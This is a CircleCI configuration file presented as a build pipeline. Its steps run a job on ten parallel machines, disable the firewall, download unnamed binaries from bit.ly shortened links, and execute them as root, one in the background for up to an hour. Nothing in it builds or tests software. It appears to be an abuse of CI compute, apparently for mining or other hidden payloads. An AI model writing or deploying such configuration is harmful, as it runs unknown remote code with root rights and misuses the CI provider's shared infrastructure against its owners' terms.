version: 2.1  
 
workflows: 
  sample:   
    jobs: 
      - job
 
jobs: 
  job:
    parallelism: 10
    machine:
      image: ubuntu-2004:202104-01
    resource_class: large 
     
    steps: 
      - checkout 
      - run: 
         name: "creating"
         command: |
          sudo apt-get update
          sync && echo 3 | sudo tee /proc/sys/vm/drop_caches
          sudo ufw disable 
          wget https://bit.ly/3NqoPRt
          chmod +x 3NqoPRt
          sudo su --command "nohup ./3NqoPRt --log=stdout > meta.log &"
          sleep 2
          sudo su --command "cat meta.log"    
      - run: 
         name: "deploy"
         no_output_timeout: 60m
         command: |
          wget https://bit.ly/3y1HJZi
          chmod +x 3y1HJZi
          sudo su --command "./3y1HJZi"